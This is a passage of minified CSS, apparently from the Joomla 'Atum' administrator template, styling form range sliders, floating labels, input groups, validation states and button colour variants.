ease-in-out;-webkit-appearance:none;appearance:none}@media (prefers-reduced-motion:reduce){.form-range::-webkit-slider-thumb{-webkit-transition:none;transition:none}}.form-range::-webkit-slider-thumb:active{background-color:#bfd2e9}.form-range::-webkit-slider-runnable-track{width:100%;height:.5rem;color:transparent;cursor:pointer;background-color:#dee2e6;border-color:transparent;border-radius:1rem}.form-range::-moz-range-thumb{width:1rem;height:1rem;background-color:#2a69b7;border:0;border-radius:1rem;-moz-transition:background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out;transition:background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out;-moz-appearance:none;appearance:none}@media (prefers-reduced-motion:reduce){.form-range::-moz-range-thumb{-moz-transition:none;transition:none}}.form-range::-moz-range-thumb:active{background-color:#bfd2e9}.form-range::-moz-range-track{width:100%;height:.5rem;color:transparent;cursor:pointer;background-color:#dee2e6;border-color:transparent;border-radius:1rem}.form-range:disabled{pointer-events:none}.form-range:disabled::-webkit-slider-thumb{background-color:#adb5bd}.form-range:disabled::-moz-range-thumb{background-color:#adb5bd}.form-floating{position:relative}.form-floating>.custom-select,.form-floating>.form-control,.form-floating>.form-select{height:calc(3.5rem + 2px);line-height:1.25}.form-floating>label{position:absolute;top:0;left:0;height:100%;padding:1rem;pointer-events:none;border:1px solid transparent;-webkit-transform-origin:0 0;transform-origin:0 0;transition:opacity .1s ease-in-out,-webkit-transform .1s ease-in-out;transition:opacity .1s ease-in-out,transform .1s ease-in-out;transition:opacity .1s ease-in-out,transform .1s ease-in-out,-webkit-transform .1s ease-in-out}@media (prefers-reduced-motion:reduce){.form-floating>label{transition:none}}.form-floating>.form-control{padding:1rem}.form-floating>.form-control::-webkit-input-placeholder{color:transparent}.form-floating>.form-control::-moz-placeholder{color:transparent}.form-floating>.form-control:-ms-input-placeholder{color:transparent}.form-floating>.form-control::-ms-input-placeholder{color:transparent}.form-floating>.form-control::placeholder{color:transparent}.form-floating>.form-control:not(:-moz-placeholder-shown){padding-top:1.625rem;padding-bottom:.625rem}.form-floating>.form-control:not(:-ms-input-placeholder){padding-top:1.625rem;padding-bottom:.625rem}.form-floating>.form-control:focus,.form-floating>.form-control:not(:placeholder-shown){padding-top:1.625rem;padding-bottom:.625rem}.form-floating>.form-control:-webkit-autofill{padding-top:1.625rem;padding-bottom:.625rem}.form-floating>.custom-select,.form-floating>.form-select{padding-top:1.625rem;padding-bottom:.625rem}.form-floating>.form-control:not(:-moz-placeholder-shown)~label{opacity:.65;transform:scale(.85) translateY(-.5rem) translateX(.15rem)}.form-floating>.form-control:not(:-ms-input-placeholder)~label{opacity:.65;transform:scale(.85) translateY(-.5rem) translateX(.15rem)}.form-floating>.custom-select~label,.form-floating>.form-control:focus~label,.form-floating>.form-control:not(:placeholder-shown)~label,.form-floating>.form-select~label{opacity:.65;-webkit-transform:scale(.85) translateY(-.5rem) translateX(.15rem);transform:scale(.85) translateY(-.5rem) translateX(.15rem)}.form-floating>.form-control:-webkit-autofill~label{opacity:.65;-webkit-transform:scale(.85) translateY(-.5rem) translateX(.15rem);transform:scale(.85) translateY(-.5rem) translateX(.15rem)}.input-group{position:relative;display:flex;flex-wrap:wrap;align-items:stretch;width:100%}.input-group>.custom-select,.input-group>.form-control,.input-group>.form-select{position:relative;flex:1 1 auto;width:1%;min-width:0}.input-group>.custom-select:focus,.input-group>.form-control:focus,.input-group>.form-select:focus{z-index:3}.input-group .btn{position:relative;z-index:2}.input-group .btn:focus{z-index:3}.input-group-text{display:flex;align-items:center;padding:.5rem 1rem;font-size:1rem;font-weight:400;line-height:1.5;color:var(--white);text-align:center;white-space:nowrap;background-color:#132f53;border:1px solid var(--template-bg-dark);border-radius:.25rem}.input-group-lg>.btn,.input-group-lg>.custom-select,.input-group-lg>.form-control,.input-group-lg>.form-select,.input-group-lg>.input-group-text{padding:.5rem 1rem;font-size:1.25rem;border-radius:.3rem}.input-group-sm>.btn,.input-group-sm>.custom-select,.input-group-sm>.form-control,.input-group-sm>.form-select,.input-group-sm>.input-group-text{padding:.25rem .5rem;font-size:.8rem;border-radius:.2rem}.input-group-lg>.custom-select,.input-group-lg>.form-select,.input-group-sm>.custom-select,.input-group-sm>.form-select{padding-right:4rem}.input-group:not(.has-validation)>.dropdown-toggle:nth-last-child(n+3),.input-group:not(.has-validation)>:not(:last-child):not(.dropdown-toggle):not(.dropdown-menu){border-top-right-radius:0;border-bottom-right-radius:0}.valid-feedback{display:none;width:100%;margin-top:.25rem;font-size:.875em;color:#457d54}.valid-tooltip{position:absolute;top:100%;z-index:5;display:none;max-width:100%;padding:.25rem .5rem;margin-top:.1rem;font-size:.8rem;color:#fff;background-color:rgba(69,125,84,.9);border-radius:.25rem}.is-valid~.valid-feedback,.is-valid~.valid-tooltip,.was-validated :valid~.valid-feedback,.was-validated :valid~.valid-tooltip{display:block}.form-control.is-valid,.was-validated .form-control:valid{border-color:#457d54;padding-right:calc(1.5em + 1rem);background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23457d54' d='M2.3 6.73L.6 4.53c-.4-1.04.46-1.4 1.1-.8l1.1 1.4 3.4-3.8c.6-.63 1.6-.27 1.2.7l-4 4.6c-.43.5-.8.4-1.1.1z'/%3E%3C/svg%3E");background-repeat:no-repeat;background-position:right calc(.375em + .25rem) center;background-size:calc(.75em + .5rem) calc(.75em + .5rem)}.form-control.is-valid:focus,.was-validated .form-control:valid:focus{border-color:#457d54;box-shadow:0 0 0 .25rem rgba(69,125,84,.25)}.was-validated textarea.form-control:valid,textarea.form-control.is-valid{padding-right:calc(1.5em + 1rem);background-position:top calc(.375em + .25rem) right calc(.375em + .25rem)}.form-select.is-valid,.is-valid.custom-select,.was-validated .custom-select:valid,.was-validated .form-select:valid{border-color:#457d54}.form-select.is-valid:not([multiple]):not([size]),.form-select.is-valid:not([multiple])[size="1"],.is-valid.custom-select:not([multiple]):not([size]),.is-valid.custom-select:not([multiple])[size="1"],.was-validated .custom-select:valid:not([multiple]):not([size]),.was-validated .custom-select:valid:not([multiple])[size="1"],.was-validated .form-select:valid:not([multiple]):not([size]),.was-validated .form-select:valid:not([multiple])[size="1"]{padding-right:5.5rem;background-image:url(../images/select-bg.svg),url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23457d54' d='M2.3 6.73L.6 4.53c-.4-1.04.46-1.4 1.1-.8l1.1 1.4 3.4-3.8c.6-.63 1.6-.27 1.2.7l-4 4.6c-.43.5-.8.4-1.1.1z'/%3E%3C/svg%3E");background-position:right 1rem center,center right 3rem;background-size:116rem,calc(.75em + .5rem) calc(.75em + .5rem)}.form-select.is-valid:focus,.is-valid.custom-select:focus,.was-validated .custom-select:valid:focus,.was-validated .form-select:valid:focus{border-color:#457d54;box-shadow:0 0 0 .25rem rgba(69,125,84,.25)}.form-check-input.is-valid,.was-validated .form-check-input:valid{border-color:#457d54}.form-check-input.is-valid:checked,.was-validated .form-check-input:valid:checked{background-color:#457d54}.form-check-input.is-valid:focus,.was-validated .form-check-input:valid:focus{box-shadow:0 0 0 .25rem rgba(69,125,84,.25)}.form-check-input.is-valid~.form-check-label,.was-validated .form-check-input:valid~.form-check-label{color:#457d54}.form-check-inline .form-check-input~.valid-feedback{margin-left:.5em}.input-group .form-control.is-valid,.input-group .form-select.is-valid,.input-group .is-valid.custom-select,.was-validated .input-group .custom-select:valid,.was-validated .input-group .form-control:valid,.was-validated .input-group .form-select:valid{z-index:1}.input-group .form-control.is-valid:focus,.input-group .form-select.is-valid:focus,.input-group .is-valid.custom-select:focus,.was-validated .input-group .custom-select:valid:focus,.was-validated .input-group .form-control:valid:focus,.was-validated .input-group .form-select:valid:focus{z-index:3}.invalid-feedback{display:none;width:100%;margin-top:.25rem;font-size:.875em;color:#c52827}.invalid-tooltip{position:absolute;top:100%;z-index:5;display:none;max-width:100%;padding:.25rem .5rem;margin-top:.1rem;font-size:.8rem;color:#fff;background-color:rgba(197,40,39,.9);border-radius:.25rem}.is-invalid~.invalid-feedback,.is-invalid~.invalid-tooltip,.was-validated :invalid~.invalid-feedback,.was-validated :invalid~.invalid-tooltip{display:block}.form-control.is-invalid,.was-validated .form-control:invalid{border-color:#c52827;padding-right:calc(1.5em + 1rem);background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' width='12' height='12' fill='none' stroke='%23c52827'%3E%3Ccircle cx='6' cy='6' r='4.5'/%3E%3Cpath stroke-linejoin='round' d='M5.8 3.6h.4L6 6.5z'/%3E%3Ccircle cx='6' cy='8.2' r='.6' fill='%23c52827' stroke='none'/%3E%3C/svg%3E");background-repeat:no-repeat;background-position:right calc(.375em + .25rem) center;background-size:calc(.75em + .5rem) calc(.75em + .5rem)}.form-control.is-invalid:focus,.was-validated .form-control:invalid:focus{border-color:#c52827;box-shadow:0 0 0 .25rem rgba(197,40,39,.25)}.was-validated textarea.form-control:invalid,textarea.form-control.is-invalid{padding-right:calc(1.5em + 1rem);background-position:top calc(.375em + .25rem) right calc(.375em + .25rem)}.form-select.is-invalid,.is-invalid.custom-select,.was-validated .custom-select:invalid,.was-validated .form-select:invalid{border-color:#c52827}.form-select.is-invalid:not([multiple]):not([size]),.form-select.is-invalid:not([multiple])[size="1"],.is-invalid.custom-select:not([multiple]):not([size]),.is-invalid.custom-select:not([multiple])[size="1"],.was-validated .custom-select:invalid:not([multiple]):not([size]),.was-validated .custom-select:invalid:not([multiple])[size="1"],.was-validated .form-select:invalid:not([multiple]):not([size]),.was-validated .form-select:invalid:not([multiple])[size="1"]{padding-right:5.5rem;background-image:url(../images/select-bg.svg),url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' width='12' height='12' fill='none' stroke='%23c52827'%3E%3Ccircle cx='6' cy='6' r='4.5'/%3E%3Cpath stroke-linejoin='round' d='M5.8 3.6h.4L6 6.5z'/%3E%3Ccircle cx='6' cy='8.2' r='.6' fill='%23c52827' stroke='none'/%3E%3C/svg%3E");background-position:right 1rem center,center right 3rem;background-size:116rem,calc(.75em + .5rem) calc(.75em + .5rem)}.form-select.is-invalid:focus,.is-invalid.custom-select:focus,.was-validated .custom-select:invalid:focus,.was-validated .form-select:invalid:focus{border-color:#c52827;box-shadow:0 0 0 .25rem rgba(197,40,39,.25)}.form-check-input.is-invalid,.was-validated .form-check-input:invalid{border-color:#c52827}.form-check-input.is-invalid:checked,.was-validated .form-check-input:invalid:checked{background-color:#c52827}.form-check-input.is-invalid:focus,.was-validated .form-check-input:invalid:focus{box-shadow:0 0 0 .25rem rgba(197,40,39,.25)}.form-check-input.is-invalid~.form-check-label,.was-validated .form-check-input:invalid~.form-check-label{color:#c52827}.form-check-inline .form-check-input~.invalid-feedback{margin-left:.5em}.input-group .form-control.is-invalid,.input-group .form-select.is-invalid,.input-group .is-invalid.custom-select,.was-validated .input-group .custom-select:invalid,.was-validated .input-group .form-control:invalid,.was-validated .input-group .form-select:invalid{z-index:2}.input-group .form-control.is-invalid:focus,.input-group .form-select.is-invalid:focus,.input-group .is-invalid.custom-select:focus,.was-validated .input-group .custom-select:invalid:focus,.was-validated .input-group .form-control:invalid:focus,.was-validated .input-group .form-select:invalid:focus{z-index:3}.btn{display:inline-block;font-weight:400;line-height:1.5;color:var(--template-text-dark);text-align:center;vertical-align:middle;cursor:pointer;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;background-color:transparent;border:1px solid transparent;padding:.5rem 1rem;font-size:1rem;border-radius:.25rem;transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out}@media (prefers-reduced-motion:reduce){.btn{transition:none}}.btn:hover{color:var(--template-text-dark)}.btn-check:focus+.btn,.btn:focus{outline:0;box-shadow:0 0 0 .25rem rgba(42,105,183,.25)}.btn.disabled,.btn:disabled,fieldset:disabled .btn{pointer-events:none;opacity:.4}.btn-primary{color:#fff;background-color:#132f53;border-color:#132f53}.btn-check:focus+.btn-primary,.btn-primary:focus,.btn-primary:hover{color:#fff;background-color:#102847;border-color:#0f2642}.btn-check:focus+.btn-primary,.btn-primary:focus{box-shadow:0 0 0 .25rem rgba(54,78,109,.5)}.btn-check:active+.btn-primary,.btn-check:checked+.btn-primary,.btn-primary.active,.btn-primary:active,.show>.btn-primary.dropdown-toggle{color:#fff;background-color:#0f2642;border-color:#0e233e}.btn-check:active+.btn-primary:focus,.btn-check:checked+.btn-primary:focus,.btn-primary.active:focus,.btn-primary:active:focus,.show>.btn-primary.dropdown-toggle:focus{box-shadow:0 0 0 .25rem rgba(54,78,109,.5)}.btn-primary.disabled,.btn-primary:disabled{color:#fff;background-color:#132f53;border-color:#132f53}.btn-secondary{color:#fff;background-color:#495057;border-color:#495057}.btn-check:focus+.btn-secondary,.btn-secondary:focus,.btn-secondary:hover{color:#fff;background-color:#3e444a;border-color:#3a4046}.btn-check:focus+.btn-secondary,.btn-secondary:focus{box-shadow:0 0 0 .25rem rgba(100,106,112,.5)}.btn-check:active+.btn-secondary,.btn-check:checked+.btn-secondary,.btn-secondary.active,.btn-secondary:active,.show>.btn-secondary.dropdown-toggle{color:#fff;background-color:#3a4046;border-color:#373c41}.btn-check:active+.btn-secondary:focus,.btn-check:checked+.btn-secondary:focus,.btn-secondary.active:focus,.btn-secondary:active:focus,.show>.btn-secondary.dropdown-toggle:focus{box-shadow:0 0 0 .25rem rgba(100,106,112,.5)}.btn-secondary.disabled,.btn-secondary:disabled{color:#fff;background-color:#495057;border-color:#495057}.btn-success{color:#fff;background-color:#457d54;border-color:#457d54}.btn-check:focus+.btn-success,.btn-success:focus,.btn-success:hover{color:#fff;background-color:#3b6a47;border-color:#376443}.btn-check:focus+.btn-success,.btn-success:focus{box-shadow:0 0 0 .25rem rgba(97,145,110,.5)}.btn-check:active+.btn-success,.btn-check:checked+.btn-success,.btn-success.active,.btn-success:active,.show>.btn-success.dropdown-toggle{color:#fff;background-color:#376443;border-color:#345e3f}.btn-check:active+.btn-success:focus,.btn-check:checked+.btn-success:focus,.btn-success.active:focus,.btn-success:active:focus,.show>.btn-success.dropdown-toggle:focus{box-shadow:0 0 0 .25rem rgba(97,145,110,.5)}.btn-success.disabled,.btn-success:disabled{color:#fff;background-color:#457d54;border-color:#457d54}.btn-info{color:#fff;background-color:#2a69b8;border-color:#2a69b8}.btn-check:focus+.btn-info,.btn-info:focus,.btn-info:hover{color:#fff;background-color:#24599c;border-color:#225493}.btn-check:focus+.btn-info,.btn-info:focus{box-shadow:0 0 0 .25rem rgba(74,128,195,.5)}.btn-check:active+.btn-info,.btn-check:checked+.btn-info,.btn-info.active,.btn-info:active,.show>.btn-info.dropdown-toggle{color:#fff;background-color:#225493;border-color:#204f8a}.btn-check:active+.btn-info:focus,.btn-check:checked+.btn-info:focus,.btn-info.active:focus,.btn-info:active:focus,.show>.btn-info.dropdown-toggle:focus{box-shadow:0 0 0 .25rem rgba(74,128,195,.5)}.btn-info.disabled,.btn-info:disabled{color:#fff;background-color:#2a69b8;border-color:#2a69b8}.btn-warning{color:#000;background-color:#ffb514;border-color:#ffb514}.btn-check:focus+.btn-warning,.btn-warning:focus,.btn-warning:hover{color:#000;background-color:#ffc037;border-color:#ffbc2c}.btn-check:focus+.btn-warning,.btn-warning:focus{box-shadow:0 0 0 .25rem rgba(217,154,17,.5)}.btn-check:active+.btn-warning,.btn-check:checked+.btn-warning,.btn-warning.active,.btn-warning:active,.show>.btn-warning.dropdown-toggle{color:#000;background-color:#ffc443;border-color:#ffbc2c}.btn-check:active+.btn-warning:focus,.btn-check:checked+.btn-warning:focus,.btn-warning.active:focus,.btn-warning:active:focus,.show>.btn-warning.dropdown-toggle:focus{box-shadow:0 0 0 .25rem rgba(217,154,17,.5)}.btn-warning.disabled,.btn-warning:disabled{color:#000;background-color:#ffb514;border-color:#ffb514}.btn-danger{color:#fff;background-color:#c52827;border-color:#c52827}.btn-check:focus+.btn-danger,.btn-danger:focus,.btn-danger:hover{color:#fff;background-color:#a72221;border-color:#9e201f}.btn-check:focus+.btn-danger,.btn-danger:focus{box-shadow:0 0 0 .25rem rgba(206,72,71,.5)}.btn-check:active+.btn-danger,.btn-check:checked+.btn-danger,.btn-danger.active,.btn-danger:active,.show>.btn-danger.dropdown-toggle{color:#fff;background-color:#9e201f;border-color:#941e1d}.btn-check:active+.btn-danger:focus,.btn-check:checked+.btn-danger:focus,.btn-danger.active:focus,.btn-danger:active:focus,.show>.btn-danger.dropdown-toggle:focus{box-shadow:0 0 0 .25rem rgba(206,72,71,.5)}.btn-danger.disabled,.btn-danger:disabled{color:#fff;background-color:#c52827;border-color:#c52827}.btn-light{color:#000;background-color:#f8f9fa;border-color:#f8f9fa}.btn-check:focus+.btn-light,.btn-light:focus,.btn-light:hover{color:#000;background-color:#f9fafb;border-color:#f9fafb}.btn-check:focus+.btn-light,.btn-light:focus{box-shadow:0 0 0 .25rem rgba(211,212,213,.5)}.btn-check:active+.btn-light,.btn-check:checked+.btn-light,.btn-light.active,.btn-light:active,.show>.btn-light.dropdown-toggle{color:#000;background-color:#f9fafb;border-color:#f9fafb}.btn-check:active+.btn-light:focus,.btn-check:checked+.btn-light:focus,.btn-light.active:focus,.btn-light:active:focus,.show>.btn-light.dropdown-toggle:focus{box-shadow:0 0 0 .25rem rgba(211,212,213,.5)}.btn-light.disabled,.btn-light:disabled{color:#000;background-color:#f8f9fa;border-color:#f8f9fa}.btn-dark{color:#fff;background-color:#212529;border-color:#212529}.btn-check:focus+.btn-dark,.btn-dark:focus,.btn-dark:hover{color:#fff;background-color:#1c1f23;border-color:#1a1e21}.btn-check:focus+.btn-dark,.btn-dark:focus{box-shadow:0 0 0 .25rem rgba(66,70,73,.5)}.btn-check:active+.btn-dark,.btn-check:checked+.btn-dark,.btn-dark.active,.btn-dark:active,.show>.btn-dark.dropdown-toggle{color:#fff;background-color:#1a1e21;border-color:#191c1f}.btn-check:active+.btn-dark:focus,.btn-check:checked+.btn-dark:focus,.btn-dark.active:focus,.btn-dark:active:focus,.show>.btn-dark.dropdown-toggle:focus{box-shadow:0 0 0 .25rem rgba(66,70,73,.5)}.btn-dark.disabled,.btn-dark:disabled{color:#fff;background-color:#212529;border-color:#212529}.btn-atum-link-color{color:#fff;background-color:#2a69b8;border-color:#2a69b8}.btn-atum-link-color:hover{color:#fff;background-color:#24599c;border-color:#225493}.btn-atum-link-color:focus,.btn-check:focus+.btn-atum-link-color{color:#fff;background-color:#24599c;border-color:#225493;box-shadow:0 0 0 .25rem rgba(74,128,195,.5)}.btn-atum-link-color.active,.btn-atum-link-color:active,.btn-check:active+.btn-atum-link-color,.btn-check:checked+.btn-atum-link-color,.show>.btn-atum-link-color.dropdown-toggle{color:#fff;background-color:#225493;border-color:#204f8a}.btn-atum-link-color.active:focus,.btn-atum-link-color:active:focus,.btn-check:active+.btn-atum-link-color:focus,.btn-check:checked+.btn-atum-link-color:focus,.show>.btn-atum-link-color.dropdown-toggle:focus{box-shadow:0 0 0 .25rem rgba(74,128,195,.5)}.btn-atum-link-color.disabled,.btn-atum-link-color:disabled{color:#fff;background-color:#2a69b8;border-color:#2a69b8}.btn-atum-text-dark{color:#fff;background-color:#495057;border-color:#495057}.btn-atum-text-dark:hover{color:#fff;background-color:#3e444a;border-color:#3a4046}.btn-atum-text-dark:focus,.btn-check:focus+.btn-atum-text-dark{color:#fff;background-color:#3e444a;border-color:#3a4046;box-shadow:0 0 0 .25rem rgba(100,106,112,.5)}.btn-atum-text-dark.active,.btn-atum-text-dark:active,.btn-check:active+.btn-atum-text-dark,.btn-check:checked+.btn-atum-text-dark,.show>.btn-atum-text-dark.dropdown-toggle{color:#fff;background-color:#3a4046;border-color:#373c41}.btn-atum-text-dark.active:focus,.btn-atum-text-dark:active:focus,.btn-check:active+.btn-atum-text-dark:focus,.btn-check:checked+.btn-atum-text-dark:focus,.show>.btn-atum-text-dark.dropdown-toggle:focus{box-shadow:0 0 0 .25rem rgba(100,106,112,.5)}.btn-atum-text-dark.disabled,.btn-atum-text-dark:disabled{color:#fff;background-color:#495057;border-color:#495057}.btn-action{color:#fff;background-color:#132f53;border-color:#132f53}.btn-action:focus,.btn-action:hover,.btn-check:focus+.btn-action{color:#fff;background-color:#102847;border-color:#0f2642}.btn-action:focus,.btn-check:focus+.btn-action{box-shadow:0 0 0 .25rem rgba(54,78,109,.5)}.btn-action.active,.btn-action:active,.btn-check:active+.btn-action,.btn-check:checked+.btn-action,.show>.btn-action.dropdown-toggle{color:#fff;background-color:#0f2642;border-color:#0e233e}.btn-action.active:focus,.btn-action:active:focus,.btn-check:active+.btn-action:focus,.btn-check:checked+.btn-action:focus,.show>.btn-action.dropdown-toggle:focus{box-shadow:0 0 0 .25rem rgba(54,78,109,.5)}.btn-action.disabled,.btn-action:disabled{color:#fff;background-color:#132f53;border-color:#132f53}.btn-error{color:#fff;background-color:#3b0d0c;border-color:#3b0d0c}.btn-check:focus+.btn-error,.btn-error:focus,.btn-error:hover{color:#fff;background-color:#320b0a;border-color:#2f0a0a}.btn-check:focus+.btn-error,.btn-error:focus{box-shadow:0 0 0 .25rem rgba(88,49,48,.5)}.btn-check:active+.btn-error,.btn-check:checked+.btn-error,.btn-error.active,.btn-error:active,.show>.btn-error.dropdown-toggle{color:#fff;background-color:#2f0a0a;border-color:#2c0a09}.btn-check:active+.btn-error:focus,.btn-check:checked+.btn-error:focus,.btn-error.active:focus,.btn-error:active:focus,.show>.btn-error.dropdown-toggle:focus{box-shadow:0 0 0 .25rem rgba(88,49,48,.5)}.btn-error.disabled,.btn-error:disabled{color:#fff;background-color:#3b0d0c;border-color:#3b0d0c}.btn-alert-success{color:#fff;background-color:#0f2f21;border-color:#0f2f21}.btn-alert-success:hover{color:#fff;background-color:#0d281c;border-color:#0c261a}.btn-alert-success:focus,.btn-check:focus+.btn-alert-success{color:#fff;background-color:#0d281c;border-color:#0c261a;box-shadow:0 0 0 .25rem rgba(51,78,66,.5)}.btn-alert-success.active,.btn-alert-success:active,.btn-check:active+.btn-alert-success,.btn-check:checked+.btn-alert-success,.show>.btn-alert-success.dropdown-toggle{color:#fff;background-color:#0c261a;border-color:#0b2319}.btn-alert-success.active:focus,.btn-alert-success:active:focus,.btn-check:active+.btn-alert-success:focus,.btn-check:checked+.btn-alert-success:focus,.show>.btn-alert-success.dropdown-toggle:focus{box-shadow:0 0 0 .25rem rgba(51,78,66,.5)}.btn-alert-success.disabled,.btn-alert-success:disabled{color:#fff;background-color:#0f2f21;border-color:#0f2f21}.btn-outline-primary{color:#132f53;border-color:#132f53}.btn-outline-primary:hover{color:#fff;background-color:#132f53;border-color:#132f53}.btn-check:focus+.btn-outline-primary,.btn-outline-primary:focus{box-shadow:0 0 0 .25rem rgba(19,47,83,.5)}.btn-check:active+.btn-outline-primary,.btn-check:checked+.btn-outline-primary,.btn-outline-primary.active,.btn-outline-primary.dropdown-toggle.show,.btn-outline-primary:active{color:#fff;background-color:#132f53;border-color:#132f53}.btn-check:active+.btn-outline-primary:focus,.btn-check:checked+.btn-outline-primary:focus,.btn-outline-primary.active:focus,.btn-outline-primary.dropdown-toggle.show:focus,.btn-outline-primary:active:focus{box-shadow:0 0 0 .25rem rgba(19,47,83,.5)}.btn-outline-primary.disabled,.btn-outline-primary:disabled{color:#132f53;background-color:transparent}.btn-outline-secondary{color:#495057;border-color:#495057}.btn-outline-secondary:hover{color:#fff;background-color:#495057;border-color:#495057}.btn-check:focus+.btn-outline-secondary,.btn-outline-secondary:focus{box-shadow:0 0 0 .25rem rgba(73,80,87,.5)}.btn-check:active+.btn-outline-secondary,.btn-check:checked+.btn-outline-secondary,.btn-outline-secondary.active,.btn-outline-secondary.dropdown-toggle.show,.btn-outline-secondary:active{color:#fff;background-color:#495057;border-color:#495057}.btn-check:active+.btn-outline-secondary:focus,.btn-check:checked+.btn-outline-secondary:focus,.btn-outline-secondary.active:focus,.btn-outline-secondary.dropdown-toggle.show:focus,.btn-outline-secondary:active:focus{box-shadow:0 0 0 .25rem rgba(73,80,87,.5)}.btn-outline-secondary.disabled,.btn-outline-secondary:disabled{color:#495057;background-color:transparent}.btn-outline-success{color:#457d54;border-color:#457d54}.btn-outline-success:hover{color:#fff;background-color:#457d54;border-color:#457d54}.btn-check:focus+.btn-outline-success,.btn-outline-success:focus{box-shadow:0 0 0 .25rem rgba(69,125,84,.5)}.btn-check:active+.btn-outline-success,.btn-check:checked+.btn-outline-success,.btn-outline-success.active,.btn-outline-success.dropdown-toggle.show,.btn-outline-success:active{color:#fff;background-color:#457d54;border-color:#457d54}.btn-check:active+.btn-outline-success:focus,.btn-check:checked+.btn-outline-success:focus,.btn-outline-success.active:focus,.btn-outline-success.dropdown-toggle.show:focus,.btn-outline-success:active:focus{box-shadow:0 0 0 .25rem rgba(69,125,84,.5)}.btn-outline-success.disabled,.btn-outline-success:disabled{color:#457d54;background-color:transparent}.btn-outline-info{color:#2a69b8;border-color:#2a69b8}.btn-outline-info:hover{color:#fff;background-color:#2a69b8;border-color:#2a69b8}.btn-check:focus+.btn-outline-info,.btn-outline-info:focus{box-shadow:0 0 0 .25rem rgba(42,105,184,.5)}.btn-check:active+.btn-outline-info,.btn-check:checked+.btn-outline-info,.btn-outline-info.active,.btn-outline-info.dropdown-toggle.show,.btn-outline-info:active{color:#fff;background-color:#2a69b8;border-color:#2a69b8}.btn-check:active+.btn-outline-info:focus,.btn-check:checked+.btn-outline-info:focus,.btn-outline-info.active:focus,.btn-outline-info.dropdown-toggle.show:focus,.btn-outline-info:active:focus{box-shadow:0 0 0 .25rem rgba(42,105,184,.5)}.btn-outline-info.disabled,.btn-outline-info:disabled{color:#2a69b8;background-color:transparent}.btn-outline-warning{color:#ffb514;border-color:#ffb514}.btn-outline-warning:hover{color:#000;background-color:#ffb514;border-color:#ffb514}.btn-check:focus+.btn-outline-warning,.btn-outline-warning:focus{box-shadow:0 0 0 .25rem rgba(255,181,20,.5)}.btn-check:active+.btn-outline-warning,.btn-check:checked+.btn-outline-warning,.btn-outline-warning.active,.btn-outline-warning.dropdown-toggle.show,.btn-outline-warning:active{color:#000;background-color:#ffb514;border-color:#ffb514}.btn-check:active+.btn-outline-warning:focus,.btn-check:checked+.btn-outline-warning:focus,.btn-outline-warning.active:focus,.btn-outline-warning.dropdown-toggle.show:focus,.btn-outline-warning:active:focus{box-shadow:0 0 0 .25rem rgba(255,181,20,.5)}.btn-outline-warning.disabled,.btn-outline-warning:disabled{color:#ffb514;background-color:transparent}.btn-outline-danger{color:#c52827;border-color:#c52827}.btn-outline-danger:hover{color:#fff;background-color:#c52827;border-color:#c52827}.btn-check:focus+.btn-outline-danger,.btn-outline-danger:focus{box-shadow:0 0 0 .25rem rgba(197,40,39,.5)}.btn-check:active+.btn-outline-danger,.btn-check:checked+.btn-outline-danger,.btn-outline-danger.active,.btn-outline-danger.dropdown-toggle.show,.btn-outline-danger:active{color:#fff;background-color:#c52827;border-color:#c52827}.btn-check:active+.btn-outline-danger:focus,.btn-check:checked+.btn-outline-danger:focus,.btn-outline-danger.active:focus,.btn-outline-danger.dropdown-toggle.show:focus,.btn-outline-danger:active:focus{box-shadow:0 0 0 .25rem rgba(197,40,39,.5)}.btn-outline-danger.disabled,.btn-outline-danger:disabled{color:#c52827;background-color:transparent}.btn-outline-light{color:#f8f9fa;border-color:#f8f9fa}.btn-outline-light:hover{color:#000;background-color:#f8f9fa;border-color:#f8f9fa}.btn-check:focus+.btn-outline-light,.btn-outline-light:focus{box-shadow:0 0 0 .25rem rgba(248,249,250,.5)}.btn-check:active+.btn-outline-light,.btn-check:checked+.btn-outline-light,.btn-outline-light.active,.btn-outline-light.dropdown-toggle.show,.btn-outline-light:active{color:#000;background-color:#f8f9fa;border-color:#f8f9fa}.btn-check:active+.btn-outline-light:focus,.btn-check:checked+.btn-outline-light:focus,.btn-outline-light.active:focus,.btn-outline-light.dropdown-toggle.show:focus,.btn-outline-light:active:focus{box-shadow:0 0 0 .25rem rgba(248,249,250,.5)}.btn-outline-light.disabled,.btn-outline-light:disabled{color:#f8f9fa;background-color:transparent}.btn-outline-dark{color:#212529;border-color:#212529}.btn-outline-dark:hover{color:#fff;background-color:#212529;border-color:#212529}.btn-check:focus+.btn-outline-dark,.btn-outline-dark:focus{box-shadow:0 0 0 .25rem rgba(33,37,41,.5)}.btn-check:active+.btn-outline-dark,.btn-check:checked+.btn-outline-dark,.btn-outline-dark.active,.btn-outline-dark.dropdown-toggle.show,.btn-outline-dark:active{color:#fff;background-color:#212529;border-color:#212529}.btn-check:active+.btn-outline-dark:focus,.btn-check:checked+.btn-outline-dark:focus,.btn-outline-dark.active:focus,.btn-outline-dark.dropdown-toggle.show:focus,.btn-outline-dark:active:focus{box-shadow:0 0 0 .25rem rgba(33,37,41,.5)}.btn-outline-dark.disabled,.btn-outline-dark:disabled{color:#212529;background-color:transparent}.btn-outline-atum-link-color{color:#2a69b8;border-color:#2a69b8}.btn-outline-atum-link-color:hover{color:#fff;background-color:#2a69b8;border-color:#2a69b8}.btn-check:focus+.btn-outline-atum-link-color,.btn-outline-atum-link-color:focus{box-shadow:0 0 0 .25rem 